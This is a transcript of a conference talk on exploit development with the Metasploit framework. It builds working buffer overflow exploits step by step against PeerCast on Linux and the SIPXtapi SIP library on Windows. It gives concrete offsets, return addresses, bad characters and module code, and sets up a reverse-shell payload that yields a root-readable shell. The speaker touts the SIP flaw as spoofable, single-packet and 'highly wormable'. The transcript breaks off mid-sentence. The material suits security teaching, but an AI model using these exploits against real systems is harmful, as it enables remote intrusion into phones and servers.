Good morning, welcome everybody to this talk. Actually, this talk is going to be more of me just rambling on for an hour and 15 minutes. I will not be disappointed if you all just decide to walk out, so don't worry. Make yourself comfortable, this is Las Vegas. Okay, so before I begin, quick introduction to this talk. If you're going to refer to the slides in this talk, don't. I pretty much whacked off 80% of the slides. I figured I'll spiff off the contents. The theme is going to be the same, but I thought, to Pluto with the slides, I've been teaching a class for the past 4 days. I've had enough of slides, and some of my students here can attest to that. So I thought I'll just do demos and show you stuff by doing stuff instead of talking about it. All right. So, quick introduction. Who am I? I am Saumil Shah. I am the CEO of a very small company called NetSquare Solutions, who does security stuff, blah, blah, blah. We're based in India. Okay. That's me. Why did I get into buffer overflows and Metasploit? Well, I used to be doing web stuff for the longest time. My personal belief is, although on the application space these days, with managed environments coming up, we're seeing less and less of overflows. There's still a huge potential for buffer overflow conditions to exist in legacy code. Also, what I feel is there's a whole lot of embedded systems coming up. There's processors everywhere. There are vectors to these processors everywhere, and I'm sure there's going to be a lot of overflows in such embedded systems. Freescale, MIPS, you name your favorite embedded processor, because crappy code still exists. People still code using Google. That's why we all have jobs. That's why we're all here, right? Okay, so that's why I got into buffer overflows, and I figured, why don't I just do a quick talk on how to use the Metasploit framework for doing R&D with buffer overflows. Back in the day, you pretty much had nothing to help you code up buffer overflows. The only thing you had at hand was VI. That's about it. But things have changed. You have a very powerful framework called Metasploit to help you play with overflow vectors, choose shellcode, get encoders, all that fun stuff. How many of you have worked with Metasploit? Quite a lot. I'm not going to rain on HDM or SpoonM's parade. I'm going to still stick to 2.6 for this talk. Those guys, I believe, are releasing 3.0, the beta version, later on today. I'm not going to be sticky about specific versions of Metasploit. 2.6, 3.0. What I'm going to talk about is, how do you plug in your own exploit into the framework? And, how do you make things work with the framework? And then how do you get the framework to choose shellcode for you and things like that? So that's what we're going to see. Quick overview about buffer overflows. Buffer overflows is the situation when you're trying to stuff a large chunk of data into a container that doesn't have enough space. What you do is trying to pour water in a cup and it spills all over. Spills over the memory, screws up everything, and it does stuff, and somehow you get a shell. So that's a typical situation. We've all done that. Thanks. Okay. If you take code like this, for instance, buffer 128 string copy argv1 into buffer, classic error situation. If you have command line argument 1, which is more than 128 bytes, this program is going to puke. It's going to throw up core. You get segmentation fault core dump. And then for guys like us, core is music to the attacker's ears. We'll use the core file to do post-mortem debugging, figure out what caused the problem, take a look at the registers, and then begin the whole process of exploit development. Right. For this session, this is actually more like a tutorial session. I'm going to cover 3 examples. I'm going to cover one example of a classic Unix Stack Overflow on Peercast. Then I'm going to cover Oracle 9.2's HTTP interface. And time permitting, there's a new SIP library out there on Windows, SIPxTappy. and there are a lot of SIP phones making use of this free library. So we'll cover an overflow situation on that. I mean, the idea here is not to educate you about how those overflows happen, but how can we plug in our research code into the Metasploit framework and get these exploits integrated into Metasploit. Right. Okay. So quick overview about the internals of things. This is the x86 CPU register map. You have 4 general purpose registers: EAX, CBX, CCX, CDX, which pretty much like your variables A, B, C, D. You have 4 pointers: the stack pointer, base pointer, source index, destination index, and lastly you have the most popular register of them all. Right? We're all in a quest for EIP. Any which way we can get EIP equals 41414141. You like say yes, go for it. Actually, if any of you guys, like making cool T-shirts, I have a request. I just want a black T-shirt which says EIP is equal to 0x41414141. Count my first order in, $29. I'll pay for that. Okay. Now, just a quick introduction about Stack Overflows. I mean, I know quite a lot of you would know this. It'll be elementary stuff, but I just want to make sure everybody in this room who still ends up staying here is familiar with this. Thank you very much, sir. Excuse me while I plug this in. I don't want to get fried by completing this. Excellent. Okay. So here we have classic process memory map. Do I have a laser pointer? No worries. Okay, over there in the dark blue region, you have the code that is loaded up from the compiler. Your process is loaded up, all the code goes there, the compiled stuff. Then down below begins the heap. I mean, heap grows from the top of the memory down. That's where you get all your malloc memory. From the bottom up, you have the stack. And the stack is used by the process to push stuff on it and pop stuff off it. Whenever a function is called, what happens when a function is called? Just a quick refresher. Program control stops where it is, saves some stuff on the stack, jumps off to where the function is, does stuff in the function, and then how does it know how to get back to where it left off from? Well, the stuff it has saved on the stack is actually a copy of the EIP where it left off from, rather specifically where it needs to resume to, and a copy of the previous frame pointer, the frame of the previous function. So when the function terminates, this is what's happening. When the function is invoked, you get your parameters pushed, you get your EBP, EIP pushed, the instruction pointer copies. When the function terminates, all the stack is cleaned up, and the copy of the saved EIP is retrieved and populated back into EIP. Cool, so far so good. So here's what happens if you have a function which is trying to dump a string into a 128-byte buffer. This is how your stack is going to look like. The frame 0, which is this light bluish region, has a local buffer on it of 128 bytes. And right immediately below the buffer, in the stack space, is a copy of the previous frame's EBP and a copy of the saved EIP. Now, if you try stuffing A's into this buffer, what's going to happen? We're going to overrun the buffer and end up overwriting copies of the saved EBP and EIP. When does it mean, question, does it mean at this point we have control of EIP? No. When do we get control of EIP? When the function returns. So, I mean, supposing you did this and the function never returned, you still don't get any love back. Only when the function returns is a copy of the saved EIP popped off, and what gets loaded into the actual EIP is what you overwrote it with. So this is your overflow situation in a nutshell. And if you do GDB or WinDBG, you'll get register values like this. EIP is 41414141. We also sometimes end up overwriting EBP. Right, so this is the buffer overflow situation. Now for all exploit development, I mean, this is actually when a vulnerability manifests itself into an error situation. Now begins the whole process of making it work. By making it work is, we're not just interested in crashing programs, are we? We want shells. So now how do you get stuff packed in to this and make the program do tricks that you want it to do? So we need to now answer the question like this. We need to somehow control EIP. Where the two things we need to do is, we can take control of EIP. We can stuff EIP with whatever 4 bytes we want. Question is, where do you want to go today? Right. Then, if you know where you want to go to, can you inject your own code in that location? And the third is, what code to inject? So once you find the 3 pieces of this puzzle, you've got a working exploit. Simple? Okay. Now there are many ways of snatching control of EIP and you know, putting your code in the buffer and jumping to it. We don't have time to cover all, but I will cover one classic situation called jump to register. This is actually a very, very reliable way of exploiting Stack Overflows. You don't need a lot of guesswork. Here's the situation. Now the top diagram is actually the stack on its side, sleeping. Okay. And you overwrite it with the buffer. You keep on overwriting it until you run into the region where EIP was saved. That's that dark blue region, overwritten with that yellow region. Right. It's amazing. And thank God I coded it with colors so I can, you know, narrate without a laser pointer. Right. Now when this function returns, more often than not, you will have some register or the other pointing to a part of this buffer. Why would a register point to a part of our buffer? Well, the answer lies in when you generate code with an optimizing compiler. A lot of times release code or production code is generated with you know, optimization for speed. Try to keep as many values immediately available in registers as far as possible, rather than loading it from, looking up a symbol table, loading it from the memory and then pushing it back to the memory. This avoids a whole lot of memory transfer. So if you've got optimized code, chances are that at the time of the overflow, you'll find one of the registers pointing to somewhere in the buffer. Maybe it's done a block copy of the part and it's, you know, pointing halfway through when it died. Maybe it's, you know, about to copy something. Maybe it's pointing to the very beginning. Maybe it's pointing to the very end. You don't know. But we can find out all this stuff from analysis. So, assuming in this case I have the example that EBP points to somewhere within 4 bytes of the beginning of our buffer. Now comes the whole idea of exploit construction. What we're going to do is, we're going to pack our shell code near the beginning of the buffer, but avoid the first 4 bytes. Then we're going to figure out some mechanism of jumping to where EBP points to. In our instruction set, especially on x86 CPUs or a whole lot of CISC CPUs, you will find instructions like jump EBP. Where do we find such an instruction? We go looking through some binaries. We go looking through basically this dark blue region on the top, the code, where our compiled code is, or where shared libraries may be loaded. This code and shared libraries are loaded at pretty much fixed offsets in most, I mean, without loss of generality. So what you do is you go looking through one of these libraries and find out a suitable instruction, say a call EBP or a jump EBP instruction. In this example, I've used user32.dll, which is one of the popular Windows DLLs that gets loaded with every Windows process. The address of call EBP in the DLL is going to be constant. So what you do is, you populate your overwritten EIP with the address of that instruction. Then when the function returns, EIP is going to be popped off, control is going to be transferred to that particular instruction within the DLL, and then that instruction is going to say call EBP, well EBP is already pointing to where your shellcode is, and voila, you get execution of shellcode. So these are some of the mechanics of how we can construct an exploit. The last part needs to be solved is where do you get the shellcode from. Okay, so now let me jump into some demos. I have a program called PeerCast, which is like a peer-to-peer streaming thing on Linux. It has an HTTP interface and it's prone to a buffer overflow. So let me show you how we can make this error situation come up and try to create an exploit for this. Okay. Now let's see how this is going to work. Let me first log into the vulnerable system and increase the fonts for our sake. Can anybody read this all the way at the back? Okay, good. Well, now, thanks to the non-mirrored displays, I will have to struggle around. All right. It's impossible. How do I like stand and type with one hand? I'm not in the habit of typing with one hand either. All right. Okay. So here I have a PeerCast. Okay, I'm going to yell. So here I have PeerCast. Is this working or? Yeah. Okay, cool. I'm going to start it up. User local PeerCast. It just starts up the binary. It's listening on port 7144, and so that's on the target system. From my attack system. Okay, let me see what I got. I got a file called aaa.txt, which pretty much throws a whole set of A's against PeerCast. We just want to see quickly how this error kicks in. So say okay, cat aaa.txt, pipe to the tool that no hacker should be without, and pipe it to port 7144. All right. And how do I keep an eye on this window at the same time? It's impossible. It's all right. Then like bleed through and anyways. Here it is. It got sent and wait a minute. Wait, it's running in the wrong port, sorry. It's running on port 17,000 in my case. Okay, there it goes, and in this other window, we get segmentation fault. Let's now look at the segmentation fault. Let's now try to analyze what happened here. So I'm going to say ls. I have a core file, core.1472, say gdb, target core.1472. If there's a typo, please tell me. Okay, no. Okay, here we get where it said program died with a segmentation fault. Let me say info registers. Sure enough, we have EIP as 41414141. Woohoo. Now, let's try to see where our buffer is in the memory. Maybe we can do it the systematic way or we can do it the donkey way. I will do it the donkey way. Let's just start dumping memory pointed to by one of these registers, and maybe we'll just get lucky. The good registers look like EDX, EBX. No, EDX is in the code. EBX and ESP seem to be good choices. The rest of the ones are botched up. Okay, so I say x64 EBX. Sorry, $EBX. Okay, I get some part of the buffer. Doesn't look, I mean, some part of the memory doesn't look interesting. Say DB, x64 ESP. ESP points to some region of my buffer. Where in the region, I don't know, but looks like it's towards the very end. Now, how do we calculate which of these 4 bytes went into EIP, and how do we calculate which region does ESP point to? Well, we can use one of Metasploit's pattern generator libraries to generate a cyclic pattern. I'll not get into details of that library right now, but what Metasploit can do for us is generate a pattern called something like this. It'll generate a cyclic pattern of alphabets and numbers such that no 4 bytes repeat themselves anywhere. Now, depending on which 4 bytes get copied into EIP and which 4 bytes appear at the location of ESP, we can find out our offsets. So let me just go and run this against Peercast and show you where the offsets come to. Okay. So let me restart Peercast. Peercast is restarted. And here, let me say cat pattern.txt pipe to netcat 192.168.7.177 port 17. Typo, too many 7s. School? Okay, so we pipe it to this and get another core dump. Okay, it's listed as core.1506. So I'll say GDB target core.1506. Okay, and now we're getting some different values. Let me say info registers, and we get a value EIP as 42306142. 42306142 is something like what? B0 small a and b. Yeah. Okay, but in reverse order. Now we just try to look for this string in the pattern and find out the offset. Okay, so let me go ahead and do that. Okay, so I'm going to use one of Metasploit's pattern matchers. There's a file called SDK pattern offset.pl, and we're going to load it up with the value that we saw here. Let's see. If 42306142, 423, no, not here. 42306142, and we're going to search for it within like a 1000 byte range. When we do this, we get the number 780. This means that EIP is overwritten after 780 bytes into the buffer. So if we create a buffer with first 780 bytes with junk, the next 4 bytes will get overwritten into EIP. So now we know where to pack these bytes in. Let us now look at the region of memory that ESP points to. So we go back to GDB and say x64 $ESP. Oops. Sorry, x/64. Okay. And ESP points to 61423161. Okay. Let's run this again. 61423161. Was that right? Yeah. And ESP points to 784, which is the next 4 bytes after where EIP was saved. Okay, so this is interesting. Now what we need to do is just create a sample exploit, plug in those values, and then we're good to go. Okay. So what we're going to do is we're going to create a 1000-byte payload. The first 780 bytes can be AAAA, anything. The next 4 bytes will be stuff that's going to be overwritten into EIP. And then we will pack our shellcode at the very end, as shown in the last diagram. Lastly, we're going to figure out a jump ESP instruction somewhere. Where do we grab this jump ESP instruction from? One of the shared libraries, or we'll try to pull it off from the peercast binary itself. Okay, and then we're good to go. Last we need is shellcode. For now, I don't know how to write shellcode in assembly. I'm going to use Metasploit to get shellcode for me. But for testing purposes, my shellcode is going to be interrupt 3, which is trap back to debugger. So if I manage to send my buffers, and on the other side I get peercast trapping back to debugger, I know that I've succeeded in my proof of concept. Okay, so that's shellcode, blah, blah, blah. We don't really care. Let me not get into all this theory stuff. Let me just show you how to do this. Okay. So let me walk you through a couple of files that I have. So I come back to demo peercast. There's a sample code that I've written called peercast1.pl, which is pretty much creates the exploit. It basically assembles a GET request, the kind which causes peercast to blow up. Then you have a pad of 780 bytes. Then you figure out where the ESP points to, that is 784 bytes. This return address, don't worry about it for now. We've picked up an address to which we want to make EIP jump to. At the end of this, we put a little knob sled of few bytes just for safety's sake, and then we attach shellcode at the end. The shellcode in this case is 200 bytes of interrupt 3. So hopefully, once this is thrown against peercast, we will be getting a trap to debugger with EIP pointing to the beginning of our shellcode. Now the last piece of the puzzle is, how did you get this return address as 0808FF97? Well, what we did is we search the peercast binaries for occurrences of this opcode, jump ESP or call ESP. We can do it the smart way, like look up the hex opcodes and do a search through it and figure out where the linkages occur, and then from the linked addresses figure out the offset. Or we can do it the easy way using, I won't say donkey way because Metasploit stuff is pretty smart. We'll do it the easy way using Metasploit's elf scan tool. So tools, Metasploit, MSF elf scan. I point it to the file. I have a copy of the peercast binary with me, and I'm looking for instructions which jump or call to ESP. So there I do. I find a few instructions. The instruction that I used is the second in the list. Question, why can't I use the first instruction in the list? 0808 FC2F. I deliberately did not use it. The 2F character is actually a slash. And if this is packed within a buffer which goes on an HTTP request, the slash is going to cause the parsing to break. So 2F is a bad character for us. We can't have it as a part of our payload. Therefore, we take the second one. We can't take the third instruction either, because the address of the third instruction is 080900E7. 00 is bad medicine. It's null terminator. It's going to break the parsing. So you have to be careful what to choose. Anyway, I chose 0808 FF97. At this location, you'll always find a jump ESP. And when you load up EIP to point to here, you will take the program control to wherever ESP is pointing to. So let's now quickly take a look at this, and then let's try to fit this all into Metasploit. Okay. Let me restart Purecast and say /purecast1.pl. This is a request generated, and I'm going to pipe it to Purecast. Once I throw it to Purecast, on the other window, the response we get is trace breakpoint trap. This is cool. That means we already reached the gates to our shellcode. Let's just quickly look at the core file and confirm this. So say gdb target core.1582. Right. And the error is not sig-segv segmentation fault. It is program terminated with a trace breakpoint trap. All right. So let me look at the registers. EIP is now pointing to some region within my stack. Let me try. Let me also take a look at ESP. If we notice, ESP points to just 2 bytes above where EIP is. So ESP is also very, very near to the shellcode. Let us take a look at the memory from there. Say x64 $EIP. Sure enough, whole lot of interrupt 3s. So this means if we replace the interrupt 3s with our shellcode, we'll get our shellcode to work. There is one slight problem in making all this work. The problem is that ESP, the stack pointer, points very much close to our shellcode. So if our shellcode makes stack operations like call or return, it's going to push and pop the stack, and maybe it'll corrupt our own shellcode. So for us, for making the shellcode run well, we've got to make the stack happy. We'll just chain the stack by 4096 and relocate the stack and then get into the shellcode. So let me show you the next revision of this exploit. Let me restart Purecast. So I have purecast2.pl, and here you see this line called my stack happiness. That is the string 81C4 FFEF FFFF44, which translate into these instructions: add ESP, 0xFFFF EFFFF. Why do we want to do this? Let us say if we do a sub ESP, 4096, the word 4096 in memory will be like 0000 something something. Those zeros we can't tolerate. So what we do is we take a 2's complement of 4096 minus 4096, which will be like FFFFFF000. That's also a problem, because we don't want the zeros at the end. So we take minus 4097, which ensures that none of those bytes are 0, and then add a 1 to it. So that's how we arrive at this add ESP, minus 4097, and then increment ESP to get ESPs equal to ESP minus 4096. You will see this string 81C4FFFF prepended to a lot of shellcode. Whenever you see this, it's for stack happiness. Okay. Now, if we do this, it's going to work and the stack is not going to interfere with our payload. Now, let me actually walk you through let me now switch over from this POC Perl files to actually creating a working Metasploit plugin. Let me quit from this. Peercast is started. Bless you. All right, so let me not get into all this. Some benefits that you get with the Metasploit framework. I mean, if you want to write your POC files, by yourself, you'll have to do all the shellcode manipulation and such. If you integrate it within Metasploit, you can code it for supporting multiple targets. You can choose dynamically shellcode from the generator. You can choose encoding to the shellcode as well, and you can make use of Metasploit's payload handlers, especially when you want to use stage shellcode. You can use advanced shellcode like Meterpreter or VNC inject or find sock shells and whatnot. And basically, you can use this to create a very, very portable, flexible, and a rugged exploit. Quick overview of the framework plugin architecture. This is very conceptual. This is pretty much the same as in 3.0 and 2.6. All the lighter yellow regions are supplied by us. We have to create the stuff in the middle. That is, once we want to create our Metasploit exploit, we have to create a preamble. Then we have to add Perl code to create the payload, and you have to launch the attack by whatever TCP or UDP or whatever vector that is chosen to launch the attack. Once we get the connection, once we launch the attack, we just hand the control back to Metasploit, where Metasploit will kick in one of its own payload handlers. Now for us, we don't have to hardcode the values in our exploit plugin. Values will be supplied at runtime from the framework. What kind of values can we get? User supplied exploit information like what host to attack, what port to attack, what offsets to use if there's peculiarity with kernel A or kernel B, all that stuff. And then we can use the framework to pick encoded shellcode for us from the framework. In 2.6, plugins are implemented as Perl modules. In 3.0, they're implemented as Ruby modules. There is a lot of pre-existing data structures that you get to be used within your Perl module. You get hashes like %info, %advanced, which you have to populate with stuff specific to your exploit. Every Perl module, every plugin has a constructor called new, which will instantiate it. Metasploit will invoke it and instantiate it. And then every module must have an exploit section, which will be called when you give the command exploit from within the Metasploit framework to to actually execute stuff. The overall structure of this is you create a package, say package MSF exploit name, you give a name to the module. You have to include the following lines like use base MSF exploit, use strict Perl coding. PEX is the Perl extension routines, extended by Metasploit. In 3.0, you have REX, which is Ruby extension routines. Then you populate these two hashes, advanced and info, with stuff. You create your constructor, and then you have exploit code. Let me actually just walk you through a skeleton Metasploit module. So for Peercast, first let me walk you through a skeleton module, then we'll see the specific one to Peercast. Okay. So here's actually a skeleton exploit module that I've just written up. You put the name of the exploit at the top. Typically, we don't really use advanced options unless they're absolutely necessary. In the info part, you specify what the name is, what the version is, who wrote it, your script kiddie handle or whatever have you, architecture of the CPU, OS that it runs on, and the priv flag is a boolean. If it is 0, that means you don't get root when you run this exploit. If it is 1, that means you get elevated privileges. The architecture and the OS will be inspected by Metasploit to reduce the available set of payloads for this exploit. I mean, if you've chosen architecture as x86 and OS as Windows, then Metasploit will only show you Windows payloads for your use. Then below you have user options, where you will ask the information from the user, what host do you want to target and what port is this thing running on. And some details about the payload, like how much maximum space is available for the payload, what are the bad characters that should never be included in the payload, and if you want to prepend it with any stack happiness. Based on this information, Metasploit will choose a proper encoder for you to create encoded shellcode which does not have any of these unnecessary characters. Then you give a description to this, any references like CVE IDs or bug track IDs or URLs where the advisory was posted for documentation. And later on, you may choose a list of targets that this exploit can work against. I mean, typically there'll be stuff like, you know, kernel 2.2, kernel 2.4, compiled with this, compiled with that, you know, running on Apache this or Java that. There'll be some values which will keep on changing from platform to platform for an exploit. Like in case of peercast binary, you got your EIP to be overwritten as 0808FF97. That's for peercast 0.1212. If it's like peercast 0.1214, it'll be like some other number. So there you just create a big list of target tables and put those values in there. And here the constructor is pretty simple. It's almost always going to be this. You just create a new self object and return it to the framework. And lastly, you have your exploit method, which you will pull off these variables from the target array that the user will populate. Pull off stuff like what's my target host, what's the target port, what's the shellcode that is chosen by the user. Later on, what you do is you construct the payload, and then you open up a socket, launch the payload, wait for a handler. This is the basic construction of the exploit module. Now, let me show you the peercast module. It's pretty much what you have to do is just make a copy of this exploit skeleton, and in the exploit method, you copy and paste code from your proof of concept if you've written it cleanly, and then just assign values and references from the rest of the Metasploit variables. It'll be clearer when I walk you through this. I've created a module called mypeercast. I just give it a name called mypeercast Linux. Put in the stuff here. Notice in the payload area, I've got space of up to 200 characters. This I find out from testing, like how much works and how much doesn't. I've got a bad character list. Like for example, you can't include null bytes, line feeds, carriage returns, spaces, ampersands, semicolons, because this payload is going to travel as a part of the URL, the URI. And we can't have these, otherwise it's going to break the parsing. We prepend it with this stack happiness assembly. And then down here, I've preloaded it with one of the offsets that I've observed. I mean, for peercast 1214, I know that EIP occurs at 780 bytes down the line, and the shellcode is referenced at 784 bytes down the buffer, and a jump ESP instruction can be found at 0x0808FF97. If you try for another version of peercast, all you got to do is add one more line to this array. You don't have to recode the exploit, just find the values from GDBing it, and your exploit will be available for yet another version of peercast. You have your constructor, and at the end, here is where you construct the payload. It's the same code that I copied from the proof of concept. You put a prefix, you put your suffix, you construct the buffer over here, and finally you create your payload, saying my payload is prefix and padding. You pack the return address, you have a little knob sled, you have your shellcode, and then the suffix. And then at the very end, all you got to do is say $s send payload, and that's going to be it. So let's now fire up the framework and make this run. Okay, peercast is running. We have a very slick web interface for Metasploit. I'm not going to use that. I'll use the classic command line thing. Say oops. //msf console, Metasploit console starting up. To use this exploit, you just say use my peercast Linux. You have to, of course, copy this Perl module into the Metasploit exploit directory and say show options. So here it is. It requires a remote host and a remote port. So I just say set our host to 192.168.7.177. So I set the remote host. So I have to set the remote port as well, 17,000, because I chose to run it on another port. And now comes the time to pick a payload. So let us say show payloads. Show payloads. We have the following payloads available to us. So let us select, what shall we do? Linux IA32 reverse shell. So I say set payload Linux IA32 reverse shell. What this payload is going to do is it's going to cause the exploited process to return me a TCP connection on my listener and bind a shell to it. I'll need to give it one more option, that is what is my host's IP address. So I say set lhost to 192.168.7.41. That's my IP address. I'm all set. And now the last thing I have to do is exploit it. So I just say exploit. Hopefully, if all goes well, the demo is not going to bomb. Ooh. Started, it says trying this. It says got a connection from remote host to me, and it's just waiting. If I say ls, here we go, ID, here we go, cat, etc password, here we go. Okay, once we're done with this, we exit and hit Control-C. The handler comes back to us. There are some exploits which you can abuse, some programs which you can exploit over and over again. Like if this wasn't enough, you just go and do it again and say, ooh, I did it again. There are some programs which you can do it once. Try not, do or do not. There is no try. And then it'll die. Okay. So this is just a quick overview of how to use the framework to integrate your exploit in. Let me show you some other examples. Let me show you a Windows example with the SIP phone, and time permitting, we'll come back and do the Oracle example because it's a little bit involved. So let me quit this framework here. And let me fire up my Windows box. All right, so here's my Windows desktop. Let me quit out of that other Peercast thing. Okay. Okay, the next demo I want to do is actually an SEH overwrite, structured exception handler overwrite exploit, which causes this SIP library to fail. So let me show you. Here's a SIP phone that I have. In fact, this is the same library that is being used in AOL Instant Messenger's Triton phone. So guess what? After this demo, you can all go back and bomb out all AOL Instant Messengers. This is like dial a shell. Okay, let me attach a debugger to this, WinDBG. So I just want to step through it and see how the vulnerability manifests itself. So I'm going to attach WinDBG and say go for this. Okay. Let me find my mouse. There it is. And show you the first proof of concept. I have a file called sipex1.pl. This is the first proof of concept for the SIP phone. What I'm doing is creating a SIP header with stuff like invite, to, via, from, call, caller ID. The interesting part is this CSEC header. I mean, the SIP header looks pretty much like any HTTP type protocol header. The CSEC header out of this SIP request contains an overflow. The overflow here is CSEC is designed only to take 24 bytes. Anything more than 24 bytes causes it to blow up. The problem is further complicated because the programmers of SIPexTAPI have put in custom exception handling. So if you actually overwrite too much, the exception handler, its own exception handler will kick in and try to save the program. Right. However, what we're going to do in this exploit is we're not going to overwrite EIP. We're not going to overwrite the EIP return value. We're going to go end up overwriting the return value for, the address of the exception handler itself. So it's like, I say, you kick a program in the rear, when it spins around, you say, that guy did it. And then that's where your handler, overwritten handler is, and you get control of EIP once again. So that's an SEH overflow, a 10-second version of how an SEH overwrite is. Okay, so at the top, at the fourth line at the top, you say my CSEC is equal to A multiplied by 30. That's good enough to kick in the exploit. However, a 30-byte shellcode does not do anything for us. I mean, we can't pack in anything practical within, not 30 bytes, actually 24 bytes is all we have. The smallest shellcode I know available which works practically is an egg hunt shellcode. I'm sure HD and Vinny might show it in their Metasploit talk. But the egg hunt shellcode still takes 28 bytes, and we can't fit that. So that's no good. But if we go and overwrite the structured exception handler, we get a really, really long buffer, and we can pack in good shellcode in there. Anyway, so let me show you some of the debug traces and analyze this really quickly. I still have 20 minutes, right? Cool. Oh, then I can take like a 2-second breather. Right. So let me launch this sipex sipex1.pl. It's going to ask me for a target host. The beauty of this exploit is it's UDP. It's not TCP. So guess what? Single packet attack. Spoof the headers all you want. Nobody's going to find out who did it. And in one packet, you dial a shell. These UDP packets are tunneled left, right, and center through, stun and all those type of things. So chances are they'll make their way through where the phone is. This is, I think, a highly wormable situation. Somebody is talking on the phone. Okay. Point it to 176. And let me pull this window a little to the side to see if something happens there. Okay. I do this, and over here, the debugger does something. What's this? Let's take a look. We don't get EIP is equal to 41414141 or anything. No such luck here. Currently, the debugger is within some exception handling routine, and there it has actually, it's actually created an exception. The handler hasn't kicked in yet. So let's try to find out where the handler is. What I'm going to do is I'm going to give this command !ex chain to just see the chain of handlers. I see 3 custom exception handlers registered. The sipex tappy, check for handler leaks, check for handle leaks, part 1, check for handle leaks 2, check for handle leaks 3. And the last exception handler registered in this is the default Visual C++ runtime MSVCRT except handler. That's the default ACH handler. The ACH handler is basically what kicks up that dialog box. Your program has thrown up. Do you want to send all details and all your IDs to Microsoft, or do you want to cancel it, or do you want to debug it? That's the code that kicks up this dialog box. We're going to overwrite the address of one of these registered exception handlers. So instead of the dialog box kicking up, we'll get control to our code. Now, all these ACH addresses are also on the stack. Let's just take a quick look and see where they're on the stack. Here it shows us the first ACH is at 011 FFBD0. For those of you who know how Windows ACHs work, is you have a linked list of ACH records. The topmost record pointing to the next one pointing to the third one, the third one pointing to the nth one, and the last record's pointer is FFFFFFF, which doesn't point anywhere. Now, below this linked list pointer, there's 4 bytes used for pointing to the next record, and the next 4 bytes contain an address to the exception handler code. Let me just show you a quick diagram to put this in perspective. So this is what is happening. You have some function which is pretty much going to be hosed when you do the overwrite. For that functions frame, you have the exception handler record. The top part of the yellow record on the top points to the next SEH in the chain, which is the bottom one. After the pointer, you have an address to the custom registered exception handler. Now, this address is always a part of the same function's frame or interspersed between the frames for all practical purposes. Therefore, if you overwrite local variables in this function and keep overwriting all the way down into the stack frame, you may definitely be able to overwrite EIP, but if you go further, you'll also end up overwriting the address of the exception handler. Then, when an exception kicks in, and it will certainly kick in because what you've done creates that exception itself, the operating system will take control. In the Unix case, what happens when process throws an exception? OS kicks in, the code in the exception handler of the OS says dump all the memory files to a core file. When this kicks in, the OS will say, okay, let me look what ACHs are registered, look at the ACH, and then jump to it. Now, if we have overwritten that address, we will get control after the OS passes it back to the exception handler. So that's the long and short theory of overwriting ACH. All right. So the luxury of overwriting ACH is A, exploits are definitely more reliable. B, you get a longer buffer to play with. Okay. So now, let me just look at the stack and find out where this address, what our stack looks like for this SIP phone. So let's start dumping values from the stack pointer, ESP, and okay, yeah, there we go. Yeah, dump out the addresses, the values from the stack. Notice over here we encounter our own buffer or a copy of it lying on the stack. So now we know where we are. We are at FFFF84. Another DDS command shows you more of the stack. Another DDS command shows you even further. Well, here is where the structured exception handler's first record is. At 011 FFBD0, those 4 bytes point to the next ACH record, which is at FFDE0. And the 4 bytes after that pointer point to this exception handler code at address 100AA406. Let us see if this address kicks in to test our theory. This address is found at location 11FFBD4 on the stack, 256 bytes below where our buffer begins on the stack. Therefore, to overwrite this address, we got to make our buffer at least 260 bytes, and we'll be able to overwrite the address of this exception handler. But first, let's see if this exception handler kicks in. So I'm going to set a breakpoint, 100AA406. So the breakpoint is set, and now let me just trace through this program. I just say G. When I say G, sure enough it says breakpoint hit. We were at that overflow situation. It trapped to the OS. The OS came back and bounced to your structured exception handler, which we which we have put a breakpoint on, and sure enough, it's at that address. So now we can create an exploit which ends up overwriting the ACH and then do the whole jump back to register thing. So let me show you a proof of concept of that, and right after that, I'll show you how integrating it within Metasploit framework works. Okay, so let me quit this. and restart the SIP phone for yet another go. Programs, SIP phone. Start up. There, started. Attach it. Attach it to the debugger. SIPX easy phone. Go. Okay, let me now walk you through the second proof of concept exploit. So here's the second proof of concept exploit, which actually let me skip this one and show you the third one itself. Okay, so here's a almost ready to roll proof of concept exploit. What we have to do is we have to create some jump code in addition to our shell code to get to this interrupt 3 region. What happens in the case of this SIP exploit is that the register does not point to the beginning of our buffer, it points to the very end. So from the very end, we have to actually jump back by some bytes. Rather, it actually points to the very end, but interrupting it is 4 bytes which we have to jump over, and then we append the shell code. So that's what these jump bytes are. Don't worry about that. Here we picked out a value for overwriting EIP as 77F9 to what is that? To A9B. This value is where a jump ESP instruction or a jump EBX instruction is found in ntdll.dll. What happens in this SIP overflow is that EBX points to the trailing end of this buffer, and we need a jump EBX instruction to successfully step through to our shellcode. We again use MSF PE scan, look through one of the one of the Windows DLLs, and in NTDLL we find this offset containing a jump EBX instruction. The length to our buffer has to be 256 bytes. We create a padding of 252 bytes. At the end of it, we put this 4-byte jump code. That is because EBX is going to be pointing to those 4 bytes. Then we put our 4-byte overwritten EIP address. The jump code has to skip over that. And then at the end of our EIP address, we put our shell code. So the construction of the buffer is like this. You have your padding of 252 A's. Then you add the jump code, you pack the EIP, you put a little knob sled, and then you have your shell code at the end. Put it into this UDP buffer and send it along its way. So let's do that. I'll run it as sipx 3.pl, and notice what happens in the debugger. Sure enough, the debugger throws an exception. And now let us step through this exception. We should now be jumping to the jump EBX instruction. Let us see where EBX is pointing to first. EBX is pointing to, currently it's not pointing anywhere, but once that overflow kicks in, it will point to the jump code, and then it will go to interrupt 3. Okay, so let me just do a G. There we are. Now our EIP is pointing to interrupt 3. If we say db EIP, you notice that EIP is already ready at the gates of our shellcode. So if we put our shellcode over here, we win. All right. Of course, to understand all this, you require to read through some papers describing SEH overrides, or play around with it enough, I guess. All right. Now, we know that we can successfully come to interrupt 3. The rest, let Metasploit take care of this. So I'm just going to run the program without the debugger and now show you the Metasploit plugin that I've coded up for this. It's pretty much the same as the Perl code, just cut and paste into the exploit method of the plugin. Right. So I've created a plugin called MySipX, and here it is. The bad characters in this one, there's actually a lot of bad characters. But what we do is we tell Metasploit to generate alphanumeric only shellcode by this variable called encoder. So we say, try and generate only alphanumeric shellcode. Down below, here we have a target for Windows 2000 Service Pack 4. If you're testing this against XP Service Pack 2, all you need to do is look through one of XP SP2's DLLs, find a proper jump PBX instruction, and instead of this 77F9 something something, you create another target record and put the address of the jump PBX of XP SP2 in there. So this is how you can make your exploit a bit more portable. The last part is, here is how we are creating the buffer. It's the same Perl code cut and pasted in there. And Metasploit allows you to launch connections against UDP as well. Instead of using MSF socket TCP, you use MSF socket UDP. Not only this, but Metasploit's libraries allow you to also create SMB packets, RPC packets, DCE packets with setting proper packet headers. So Metasploit's got a rich set of network packet crafting libraries as well. So all we got to do is just create a new UDP socket and just do a send packet. Since this is not TCP, we don't have to invoke the handler. It's just gone, 